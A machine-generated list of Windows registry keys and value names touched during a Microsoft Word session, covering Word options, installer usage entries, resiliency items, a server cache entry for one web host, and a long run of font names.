HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\36302
36302
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
File Path
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Datetime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Position
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Data
Toolbars
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Toolbars\Settings
Microsoft Word
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
DefaultFormat
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
VisiFlm
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
VisiForceField
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
IgnoreFilenamesEmailAliases
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
AutoSpell
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
NoContextSpell
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
AutoGrammar
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
AutosaveInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
InsPic
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
SoundFeedback
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
PreferredView
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
BkgrndPag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
ATUserAdded
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
AccentOnUpper
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options
AppWindowPos
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\IOAV
LastBootTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingConfigurableSettings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastSyncTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Roaming
RoamingLastWriteTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\internet\Server Cache
Count
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\36302
36302
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Datetime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
&'0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
''0
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheMaintenanceGuid
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
TimeCacheMaintenanceStart
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheMigrationAttempted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
qp+
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
>s+
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
$w+
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Count
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://polpharmar.com/
Type
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://polpharmar.com/
Protocol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://polpharmar.com/
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://polpharmar.com/
Flags
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://polpharmar.com/
CobaltMajorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://polpharmar.com/
CobaltMinorVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://polpharmar.com/
MsDavExt
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://polpharmar.com/
Expiration
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://polpharmar.com/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\6D22D
6D22D
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
